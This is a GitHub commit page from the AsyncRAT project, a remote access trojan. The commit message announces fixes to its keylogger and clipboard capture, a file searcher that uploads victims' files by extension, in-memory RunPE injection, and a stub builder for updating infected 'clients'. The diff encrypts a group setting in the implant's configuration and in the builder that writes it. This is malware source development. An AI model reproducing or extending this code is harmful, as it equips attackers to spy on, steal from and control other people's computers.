Skip to content

Commit dfa505e

Browse files
committed
Update
fixed send to disk fixed keylogger [clipboard] #172 fixed installation added file searcher [to search and upload any file by it extension] added group to listview updated plugin save method updated runpe send to memory minor improvements ## NOTE You need to create a new stub from this version, and then use your old version to update all your clients, otherwise, you won't be able to use the new plugins
1 parent 7af20a2 commit dfa505e

File tree

2 files changed

+3
-2
lines changed

2 files changed

+3
-2
lines changed

AsyncRAT-C#/Client/Settings.cs

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -46,7 +46,7 @@ public static class Settings
4646
public static Aes256 aes256;
4747
public static string Pastebin = "%Pastebin%";
4848
public static string BDOS = "%BDOS%";
49-
public static string Hwid = "";
49+
public static string Hwid = null;
5050
public static string Delay = "%Delay%";
5151
public static string Group = "%Group%";
5252
#endif
@@ -69,6 +69,7 @@ public static bool InitializeSettings()
6969
Pastebin = aes256.Decrypt(Pastebin);
7070
Anti = aes256.Decrypt(Anti);
7171
BDOS = aes256.Decrypt(BDOS);
72+
Group = aes256.Decrypt(Group);
7273
Hwid = HwidGen.HWID();
7374
Serversignature = aes256.Decrypt(Serversignature);
7475
ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate)));

AsyncRAT-C#/Server/Forms/FormBuilder.cs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -450,7 +450,7 @@ private void WriteSettings(ModuleDefMD asmDef, string AsmName)
450450
method.Body.Instructions[i].Operand = numDelay.Value.ToString();
451451

452452
if (method.Body.Instructions[i].Operand.ToString() == "%Group%")
453-
method.Body.Instructions[i].Operand = txtGroup.Text;
453+
method.Body.Instructions[i].Operand = aes.Encrypt(txtGroup.Text);
454454
}
455455
}
456456
}

0 commit comments

Comments
 (0)